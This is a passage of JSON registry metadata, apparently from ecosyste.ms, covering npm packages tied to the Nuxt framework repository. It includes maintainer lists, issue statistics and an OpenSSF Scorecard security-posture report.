":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"Mini-ghost","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2025-10-11T01:13:22.618Z","updated_at":"2025-10-11T01:13:22.618Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343191,"name":"@rsnuxt/generator","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":14,"first_release_published_at":"2025-02-11T09:14:54.723Z","latest_release_published_at":"2025-09-08T05:31:55.887Z","latest_release_number":"0.5.8","last_synced_at":"2026-05-11T01:23:06.229Z","created_at":"2025-02-11T09:37:07.990Z","updated_at":"2026-05-11T01:23:06.229Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/generator","install_command":"npm install @rsnuxt/generator","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.8"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:02.563Z","dependent_packages_count":0,"downloads":748,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/generator","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/generator","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/generator","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/generator/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-29T15:00:10.594Z","issues_count":6012,"pull_requests_count":6873,"avg_time_to_close_issue":11687876.257486388,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4403,"pull_requests_closed_count":6053,"pull_request_authors_count":592,"issue_authors_count":3405,"avg_comments_per_issue":4.152361942781105,"avg_comments_per_pull_request":2.4965808235122946,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2974,"past_year_issues_count":569,"past_year_pull_requests_count":797,"past_year_avg_time_to_close_issue":619953.7635135135,"past_year_avg_time_to_close_pull_request":235897.91202872532,"past_year_issues_closed_count":296,"past_year_pull_requests_closed_count":557,"past_year_pull_request_authors_count":102,"past_year_issue_authors_count":437,"past_year_avg_comments_per_issue":2.2530755711775043,"past_year_avg_comments_per_pull_request":3.1442910915934754,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":271,"past_year_merged_pull_requests_count":485,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"Mini-ghost","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fgenerator/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:20.520Z","updated_at":"2025-02-11T09:42:20.520Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343192,"name":"@rsnuxt/cli","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":20,"first_release_published_at":"2025-02-11T09:14:56.668Z","latest_release_published_at":"2025-09-08T05:31:57.581Z","latest_release_number":"0.5.8","last_synced_at":"2026-05-11T01:23:06.326Z","created_at":"2025-02-11T09:37:08.083Z","updated_at":"2026-05-11T01:23:06.326Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/cli","install_command":"npm install @rsnuxt/cli","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","0.2.2-alpha.2":"0.2.2-alpha.2","latest":"0.5.8"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_